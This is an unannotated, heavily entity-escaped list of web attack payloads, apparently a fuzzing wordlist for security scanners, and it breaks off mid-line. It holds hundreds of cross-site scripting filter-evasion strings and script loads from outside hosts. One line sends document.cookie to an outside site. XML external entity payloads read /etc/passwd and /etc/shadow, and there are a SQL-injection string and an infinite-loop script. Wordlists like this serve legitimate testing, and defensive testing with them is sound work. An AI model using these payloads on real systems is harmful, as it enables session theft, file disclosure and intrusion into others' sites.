HTTP-EQUIV=\\\&quot;;CONTENT-TYPE\\\&quot;; CONTENT=\\\&quot;;text/html; charset=UTF-7\\\&quot;;&gt;; &lt;;/HEAD&gt;;+ADw-SCRIPT+AD4-alert(\\\&#039;;XSS\\\&#039;;);+ADw-/SCRIPT+AD4-\\r\\n\\\\\\\&quot;;;alert(\\\&#039;;XSS\\\&#039;;);//\\r\\n&lt;;/TITLE&gt;;&lt;;SCRIPT&gt;;alert(\\\&quot;XSS\\\&quot;);&lt;;/SCRIPT&gt;;\\r\\n&lt;;STYLE&gt;;@im\\\\port\\\&#039;;\\\\ja\\\\vasc\\\\ript:alert(\\\&quot;;XSS\\\&quot;;)\\\&#039;;;&lt;;/STYLE&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;jav&amp;#x09;ascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;jav&amp;;#x09;ascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;jav&amp;;#x0A;ascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;jav&amp;;#x0D;ascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;IMG&amp;#x0D;SRC&amp;#x0D;=&amp;#x0D;\\\&quot;;&amp;#x0D;j&amp;#x0D;a&amp;#x0D;v&amp;#x0D;a&amp;#x0D;s&amp;#x0D;c&amp;#x0D;r&amp;#x0D;i&amp;#x0D;p&amp;#x0D;t&amp;#x0D;:&amp;#x0D;a&amp;#x0D;l&amp;#x0D;e&amp;#x0D;r&amp;#x0D;t&amp;#x0D;&amp;#x0D;\\\&#039;;&amp;#x0D;X&amp;#x0D;S&amp;#x0D;S&amp;#x0D;\\\&#039;;&amp;#x0D;)&amp;#x0D;\\\&quot;;&amp;#x0D;&gt;;&amp;#x0D;\\r\\nperl -e \\\&#039;;print \\\&quot;;&lt;;IM SRC=java\\\\0script:alert(\\\&quot;;XSS\\\&quot;;)&gt;\\\&quot;;;\\\&#039;;&gt;; out\\r\\nperl -e \\\&#039;;print \\\&quot;;&amp;;&lt;;SCR\\\\0IPT&gt;;alert(\\\&quot;;XSS\\\&quot;;)&lt;;/SCR\\\\0IPT&gt;;\\\&quot;;;\\\&#039;; &gt;; out\\r\\n&lt;;IMG SRC=\\\&quot;; &amp;;#14; javascript:alert(\\\&#039;;XSS\\\&#039;;);\\\&quot;;&gt;;\\r\\n&lt;;SCRIPT/XSS SRC=\\\&quot;;http://ha.ckers.org/xss.js\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;BODY onload!#$%&amp;;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\&quot;;XSS\\\&quot;;)&gt;;\\r\\n&lt;;SCRIPT SRC=http://ha.ckers.org/xss.js\\r\\n&lt;;SCRIPT SRC=//ha.ckers.org/.j&gt;;\\r\\n&lt;;IMG SRC=\\\&quot;;javascript:alert(\\\&#039;;XSS\\\&#039;;)\\\&quot;;\\r\\n&lt;;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;;\\r\\n&lt;;&lt;;SCRIPT&gt;;alert(\\\&quot;;XSS\\\&quot;;);//&lt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;IMG \\\&quot;;\\\&quot;;\\\&quot;;&gt;;&lt;;SCRIPT&gt;;alert(\\\&quot;;XSS\\\&quot;;)&lt;;/SCRIPT&gt;;\\\&quot;;&gt;;\\r\\n&lt;;SCRIPT&gt;;a=/XSS/\\r\\n&lt;;SCRIPT a=\\\&quot;;&gt;;\\\&quot;; SRC=\\\&quot;;http://ha.ckers.org/xss.js\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT =\\\&quot;;blah\\\&quot;; SRC=\\\&quot;;http://ha.ckers.org/xss.js\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT a=\\\&quot;;blah\\\&quot;; \\\&#039;;\\\&#039;; SRC=\\\&quot;;http://ha.ckers.org/xss.js\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT \\\&quot;;a=\\\&#039;;&gt;;\\\&#039;;\\\&quot;; SRC=\\\&quot;;http://ha.ckers.org/xss.js\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT a=`&gt;;` SRC=\\\&quot;;http://ha.ckers.org/xss.js\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT&gt;;document.write(\\\&quot;;&lt;;SCRI\\\&quot;;);&lt;;/SCRIPT&gt;;PT SRC=\\\&quot;;http://ha.ckers.org/xss.js\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;SCRIPT a=\\\&quot;;&gt;\\\&#039;;&gt;\\\&quot;; SRC=\\\&quot;;http://ha.ckers.org/xss.js\\\&quot;;&gt;;&lt;;/SCRIPT&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://66.102.7.147/\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://1113982867/\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://0x42.0x0000066.0x7.0x93/\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://0102.0146.0007.00000223/\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;h&amp;#x0A;tt&amp;#09;p://6&amp;;#09;6.000146.0x7.147/\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;//www.google.com/\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;//google\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://ha.ckers.org@google\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://google:ha.ckers.org\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://google.com/\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://www.google.com./\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;javascript:document.location=\\\&#039;;http://www.google.com/\\\&#039;;\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;;A HREF=\\\&quot;;http://www.gohttp://www.google.com/ogle.com/\\\&quot;;&gt;;XSS&lt;;/A&gt;;\\r\\n&lt;script&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&lt;img SRC=\\\&quot;jav ascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img SRC=\\\&quot; &amp;#14; javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;body onload!#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=document.vulnerable=true;&gt;\\r\\n&lt;&lt;SCRIPT&gt;document.vulnerable=true;//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;script &lt;B&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&lt;img SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;\\r\\n&lt;iframe src=\\\&quot;javascript:document.vulnerable=true; &lt;\\r\\n&lt;script&gt;a=/XSS/\\\\ndocument.vulnerable=true;&lt;/script&gt;\\r\\n\\\\\\\&quot;;document.vulnerable=true;;//\\r\\n&lt;/title&gt;&lt;SCRIPT&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&lt;input TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;body BACKGROUND=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;body ONLOAD=document.vulnerable=true;&gt;\\r\\n&lt;img DYNSRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img LOWSRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;bgsound SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;br SIZE=\\\&quot;&amp;{document.vulnerable=true}\\\&quot;&gt;\\r\\n&lt;LAYER SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;&lt;/LAYER&gt;\\r\\n&lt;link REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;style&gt;li {list-style-image: url(\\\&quot;javascript:document.vulnerable=true;\\\&quot;);&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;img SRC=\\\&#039;vbscript:document.vulnerable=true;\\\&#039;&gt;\\r\\n1script3document.vulnerable=true;1/script3\\r\\n&lt;meta HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0; URL=http://;URL=javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;&lt;/iframe&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;&lt;/frameset&gt;\\r\\n&lt;table BACKGROUND=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;table&gt;&lt;TD BACKGROUND=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;div STYLE=\\\&quot;background-image: url(javascript:document.vulnerable=true;)\\\&quot;&gt;\\r\\n&lt;div STYLE=\\\&quot;background-image: url(&amp;#1;javascript:document.vulnerable=true;)\\\&quot;&gt;\\r\\n&lt;div STYLE=\\\&quot;width: expression(document.vulnerable=true);\\\&quot;&gt;\\r\\n&lt;style&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:document.vulnerable=true\\\&#039;;&lt;/style&gt;\\r\\n&lt;img STYLE=\\\&quot;xss:expr/*XSS*/ession(document.vulnerable=true)\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(document.vulnerable=true)\\\&quot;&gt;\\r\\nexp/*&lt;A STYLE=\\\&#039;no\\\\xss:noxss(\\\&quot;*//*\\\&quot;);xss:ex/*XSS*//*/*/pression(document.vulnerable=true)\\\&#039;&gt;\\r\\n&lt;style TYPE=\\\&quot;text/javascript\\\&quot;&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;style&gt;.XSS{background-image:url(\\\&quot;javascript:document.vulnerable=true\\\&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/a&gt;\\r\\n&lt;style type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:document.vulnerable=true\\\&quot;)}&lt;/style&gt;\\r\\n&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;document.vulnerable=true;&lt;/SCRIPT&gt;&lt;![endif]--&gt;\\r\\n&lt;base HREF=\\\&quot;javascript:document.vulnerable=true;//\\\&quot;&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:document.vulnerable=true&gt;&lt;/object&gt;\\r\\n&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![&lt;IMG SRC=\\\&quot;javas]]&lt;![cript:document.vulnerable=true;\\\&quot;&gt;]]&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/span&gt;\\r\\n&lt;XML ID=\\\&quot;xss\\\&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\&quot;javas&lt;!-- --&gt;cript:document.vulnerable=true\\\&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\&quot;#xss\\\&quot; DATAFLD=\\\&quot;B\\\&quot; DATAFORMATAS=\\\&quot;HTML\\\&quot;&gt;&lt;/span&gt;\\r\\n&lt;html&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\&quot;t\\\&quot; ns=\\\&quot;urn:schemas-microsoft-com:time\\\&quot;&gt;&lt;?import namespace=\\\&quot;t\\\&quot; implementation=\\\&quot;#default#time2\\\&quot;&gt;&lt;t:set attributeName=\\\&quot;innerHTML\\\&quot; to=\\\&quot;XSS&lt;SCRIPT DEFER&gt;document.vulnerable=true&lt;/SCRIPT&gt;\\\&quot;&gt;&lt;/BODY&gt;&lt;/html&gt;\\r\\n&lt;? echo(\\\&#039;&lt;SCR)\\\&#039;;echo(\\\&#039;IPT&gt;document.vulnerable=true&lt;/SCRIPT&gt;\\\&#039;); ?&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\&quot;Set-Cookie\\\&quot; Content=\\\&quot;USERID=&lt;SCRIPT&gt;document.vulnerable=true&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;head&gt;&lt;META HTTP-EQUIV=\\\&quot;CONTENT-TYPE\\\&quot; CONTENT=\\\&quot;text/html; charset=UTF-7\\\&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-\\r\\n&lt;a href=\\\&quot;javascript#document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;div onmouseover=\\\&quot;document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img dynsrc=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;input type=\\\&quot;image\\\&quot; dynsrc=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;bgsound src=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&amp;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&amp;{document.vulnerable=true;};\\r\\n&lt;img src=&amp;{document.vulnerable=true;};&gt;\\r\\n&lt;link rel=\\\&quot;stylesheet\\\&quot; href=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;iframe src=\\\&quot;vbscript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;mocha:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;livescript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;a href=\\\&quot;about:&lt;script&gt;document.vulnerable=true;&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;meta http-equiv=\\\&quot;refresh\\\&quot; content=\\\&quot;0;url=javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;body onload=\\\&quot;document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;background-image: url(javascript:document.vulnerable=true;);\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;behaviour: url([link to code]);\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;binding: url([link to code]);\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;width: expression(document.vulnerable=true;);\\\&quot;&gt;\\r\\n&lt;style type=\\\&quot;text/javascript\\\&quot;&gt;document.vulnerable=true;&lt;/style&gt;\\r\\n&lt;object classid=\\\&quot;clsid:...\\\&quot; codebase=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.vulnerable=true;//--&gt;&lt;/script&gt;\\r\\n&lt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;\\r\\n&lt;![&lt;!--]]&lt;script&gt;document.vulnerable=true;//--&gt;&lt;/script&gt;\\r\\n&lt;!-- -- --&gt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;&lt;!-- -- --&gt;\\r\\n&lt;img src=\\\&quot;blah\\\&quot;onmouseover=\\\&quot;document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;img src=\\\&quot;blah&gt;\\\&quot; onmouseover=\\\&quot;document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;xml src=\\\&quot;javascript:document.vulnerable=true;\\\&quot;&gt;\\r\\n&lt;xml id=\\\&quot;X\\\&quot;&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.vulnerable=true;&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;\\r\\n&lt;div datafld=\\\&quot;b\\\&quot; dataformatas=\\\&quot;html\\\&quot; datasrc=\\\&quot;#X\\\&quot;&gt;&lt;/div&gt;\\r\\n[\\\\xC0][\\\\xBC]script&gt;document.vulnerable=true;[\\\\xC0][\\\\xBC]/script&gt;\\r\\n&lt;style&gt;@import\\\&#039;http://www.securitycompass.com/xss.css\\\&#039;;&lt;/style&gt;\\r\\n&lt;meta HTTP-EQUIV=\\\&quot;Link\\\&quot; Content=\\\&quot;&lt;http://www.securitycompass.com/xss.css&gt;; REL=stylesheet\\\&quot;&gt;\\r\\n&lt;style&gt;BODY{-moz-binding:url(\\\&quot;http://www.securitycompass.com/xssmoz.xml#xss\\\&quot;)}&lt;/style&gt;\\r\\n&lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;http://www.securitycompass.com/scriptlet.html\\\&quot;&gt;&lt;/object&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\&quot;xss\\\&quot; implementation=\\\&quot;http://www.securitycompass.com/xss.htc\\\&quot;&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/html&gt;\\r\\n&lt;script SRC=\\\&quot;http://www.securitycompass.com/xss.jpg\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;&lt;SCR\\\&#039;\\\&quot;--&gt;&lt;!--#exec cmd=\\\&quot;/bin/echo \\\&#039;IPT SRC=http://www.securitycompass.com/xss.js&gt;&lt;/SCRIPT&gt;\\\&#039;\\\&quot;--&gt;\\r\\n&lt;script a=\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script =\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script a=\\\&quot;&gt;\\\&quot; \\\&#039;\\\&#039; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script \\\&quot;a=\\\&#039;&gt;\\\&#039;\\\&quot; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script a=`&gt;` SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script a=\\\&quot;&gt;\\\&#039;&gt;\\\&quot; SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;script&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://www.securitycompass.com/xss.js\\\&quot;&gt;&lt;/script&gt;\\r\\n&lt;div style=\\\&quot;binding: url(http://www.securitycompass.com/xss.js);\\\&quot;&gt; [Mozilla]\\r\\n\\\&quot;;&gt;;&lt;;BODY onload!#$%&amp;;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\&quot;;XSS\\\&quot;;)&gt;;\\r\\n&lt;;/script&gt;;&lt;;script&gt;;alert(1)&lt;;/script&gt;;\\r\\n&lt;;/br style=a:expression(alert())&gt;;\\r\\n&lt;;scrscriptipt&gt;;alert(1)&lt;;/scrscriptipt&gt;;\\r\\n&lt;;br size=\\\\\\\&quot;;&amp;;{alert(&amp;#039;XSS&amp;#039;)}\\\\\\\&quot;;&gt;;\\r\\nperl -e &amp;#039;print \\\\\\\&quot;;&lt;;IMG SRC=java\\\\0script:alert(\\\\\\\&quot;;XSS\\\\\\\&quot;;)&gt;;\\\\\\\&quot;;;&amp;#039; &gt;; out\\r\\nperl -e &amp;#039;print \\\\\\\&quot;;&lt;;SCR\\\\0IPT&gt;;alert(\\\\\\\&quot;;XSS\\\\\\\&quot;;)&lt;;/SCR\\\\0IPT&gt;;\\\\\\\&quot;;;&amp;#039; &gt;; out\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=\\\&quot;http://www.procheckup.com/?sid=\\\&quot;%2bdocument.cookie)&gt;\\r\\n&lt;~/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n&lt;~/XSS STYLE=xss:expression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n\\\&quot;&gt;&lt;script&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/script&gt;\\r\\n&lt;/XSS/*-*/STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\nXSS/*-*/STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\nXSS STYLE=xss:e/**/xpression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n&lt;/XSS STYLE=xss:expression(alert(\\\&#039;XSS\\\&#039;))&gt;\\r\\n&gt;\\\&quot;&gt;&lt;script&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/script&gt;&amp;\\r\\n\\\&quot;&gt;&lt;STYLE&gt;@import\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;;&lt;/STYLE&gt;\\r\\n&gt;\\\&quot;\\\&#039;&gt;&lt;img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)&gt;\\r\\n&gt;%22%27&gt;&lt;img%20src%3d%22javascript:alert(%27%20XSS%27)%22&gt;\\r\\n\\\&#039;%uff1cscript%uff1ealert(\\\&#039;XSS\\\&#039;)%uff1c/script%uff1e\\\&#039;\\r\\n\\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt:alert(&amp;quot;XSS&lt;WBR&gt;&amp;quot;)&gt;\\r\\n&lt;IMGSRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;&lt;WBR&gt;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;&lt;WBR&gt;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;&lt;WBR&gt;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83&lt;WBR&gt;;&amp;#83;&amp;#39;&amp;#41&gt;\\r\\n&lt;IMGSRC=&amp;#0000106&amp;#0000097&amp;&lt;WBR&gt;#0000118&amp;#0000097&amp;#0000115&amp;&lt;WBR&gt;#0000099&amp;#0000114&amp;#0000105&amp;&lt;WBR&gt;#0000112&amp;#0000116&amp;#0000058&amp;&lt;WBR&gt;#0000097&amp;#0000108&amp;#0000101&amp;&lt;WBR&gt;#0000114&amp;#0000116&amp;#0000040&amp;&lt;WBR&gt;#0000039&amp;#0000088&amp;#0000083&amp;&lt;WBR&gt;#0000083&amp;#0000039&amp;#0000041&gt; \\r\\n&lt;IMGSRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;&lt;WBR&gt;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;&lt;WBR&gt;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;&lt;WBR&gt;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0A;ascript:alert(&lt;WBR&gt;\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0D;ascript:alert(&lt;WBR&gt;\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;\\r\\n&lt;?xml version=\\\&quot;1.0\\\&quot; encoding=\\\&quot;ISO-8859-1\\\&quot;?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert(\\\&#039;gotcha\\\&#039;);&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\&quot;1.0\\\&quot; encoding=\\\&quot;ISO-8859-1\\\&quot;?&gt;&lt;foo&gt;&lt;![CDATA[\\\&#039; or 1=1 or \\\&#039;\\\&#039;=\\\&#039;]]&gt;&lt;/foof&gt;\\r\\n&lt;?xml version=\\\&quot;1.0\\\&quot; encoding=\\\&quot;ISO-8859-1\\\&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\&quot;file://c:/boot.ini\\\&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\&quot;1.0\\\&quot; encoding=\\\&quot;ISO-8859-1\\\&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\&quot;file:///etc/passwd\\\&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\&quot;1.0\\\&quot; encoding=\\\&quot;ISO-8859-1\\\&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\&quot;file:///etc/shadow\\\&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;\\r\\n&lt;?xml version=\\\&quot;1.0\\\&quot; encoding=\\\&quot;ISO-8859-1\\\&quot;?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM \\\&quot;file:///dev/random\\\&quot;&gt;]&gt;&lt;foo&gt;&amp;xee;&lt;/foo&gt;\\r\\n&lt;script&gt;alert(\\\&#039;XSS\\\&#039;)&lt;/script&gt;\\r\\n%3cscript%3ealert(\\\&#039;XSS\\\&#039;)%3c/script%3e\\r\\n%22%3e%3cscript%3ealert(\\\&#039;XSS\\\&#039;)%3c/script%3e\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt; \\r\\n&lt;img src=xss onerror=alert(1)&gt;\\r\\n&lt;IMG \\\&quot;\\\&quot;\\\&quot;&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x09;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;IMG 